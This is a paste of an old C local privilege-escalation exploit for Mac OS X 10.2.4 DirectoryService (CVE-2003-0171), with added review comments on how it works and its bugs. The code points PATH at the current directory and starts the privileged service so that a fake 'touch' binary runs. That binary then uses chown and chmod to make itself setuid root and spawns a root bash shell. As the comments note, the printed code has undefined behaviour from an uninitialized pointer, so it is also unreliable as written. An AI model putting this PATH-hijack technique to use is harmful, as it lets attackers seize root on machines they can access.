FlyFar

Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Local Privilege Escalation - CVE-2003-0171

Jan 23rd, 2024
  1. /*
  2.    OS X <= 10.2.4 DirectoryService local root PATH exploit
  3.    DirectoryService must be crashed prior to execution, per
  4.    @stake advisory.  If you discover how to crash DirectoryService
  5.    e-mail me at neeko@haackey.com  [Neeko Oni]
  6.  
  7. --
  8. Assuming DirectoryService has been crashed/killed, compile
  9. this code as 'touch' (gcc osxds.c -o touch) and execute.
  10.  
  11. bash$ ./touch
  12. *bunch of stuff here*
  13. euid is root.
  14. bash#
  15.  
  16. */
  17.  
  18. #include <stdio.h>
  19. #include <stdlib.h>
  20. #include <unistd.h>
  21. #include <sys/types.h>
  22.  
  23. int
  24. main(int argc, char **argv)
  25. {
          /*
           * Proof-of-concept for the DirectoryService PATH issue named in the
           * page title (CVE-2003-0171); the file header says the binary is to
           * be built under the name "touch". Two paths are visible:
           *   - no arguments: acts as the launcher, or, when the effective
           *     uid is already 0, replaces itself with /bin/bash;
           *   - any argument: skips the launcher and runs only the
           *     chown/chmod line at the bottom. Presumably this is the path
           *     taken when a privileged process resolves a bare "touch"
           *     through the inherited PATH -- confirm against the @stake
           *     advisory the header cites.
           *
           * Defender's reading: the root cause is a privileged program
           * locating a helper by bare name through a caller-controlled PATH.
           * Privileged code should invoke helpers by absolute path and reset
           * its environment before doing so; a set-id root file appearing in
           * a user-writable directory is the artefact this leaves behind.
           *
           * NOTE(review): main returns no value, and <string.h> is not
           * included although strcpy() is used.
           */
  26.     char           *ORIGPATH;    /* NOTE(review): no initializer, and never assigned before the strcpy() below */
  27.     int             temp;        /* never used in this function */
  28.     if (argc < 2) {
              /* Already privileged (second pass, after the re-exec at the end of this branch). */
  29.         if (geteuid() == 0) {
  30.         printf("euid is root.\n");
  31.         setuid(0);
  32.         execl("/bin/bash", "bash", NULL);
  33.         }
              /*
               * NOTE(review): ORIGPATH points at no storage here, so this copy
               * is undefined behaviour; getenv() can also return NULL. The
               * listing is not well-defined C as printed.
               */
  34.         strcpy(ORIGPATH, getenv("PATH"));
  35.         printf("Original path: %s\n", ORIGPATH);
              /*
               * PATH becomes the current directory only; the child started
               * below inherits this environment through execl().
               */
  36.         setenv("PATH", ".", 1);
  37.         printf("New path: %s\n", getenv("PATH"));
  38.         printf("Executing DirectoryService with false PATH...\n");
              /*
               * fork() is not checked for -1, and if execl() fails the child
               * falls through and continues with the statements below.
               */
  39.         if (fork() == 0) {
  40.             execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
  41.         }
  42.         printf("Forked DirectoryService, pausing before shell exec...\n");
              /* Fixed three-second wait; the child is never waited on or reaped. */
  43.         sleep(3);
  44.         printf("Cross your fingers.\n");
  45.         setenv("PATH", ORIGPATH, 1);
  46.         printf("Path restored: %s\n", getenv("PATH"));
              /*
               * Re-executes this same file with no arguments, so the geteuid()
               * check at the top of this branch is evaluated again.
               */
  47.         execl("./touch", "touch", NULL);       
  48.     }
      /*
       * Reached when argc >= 2, or when the execl() just above fails. Asks the
       * shell to make ./touch owned by root and set-id; both the path and the
       * result depend on the current directory, and the chown can only succeed
       * for a caller that already has root privileges.
       */
  49. system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
  50. }
  51.  
  52. // milw0rm.com [2003-04-18]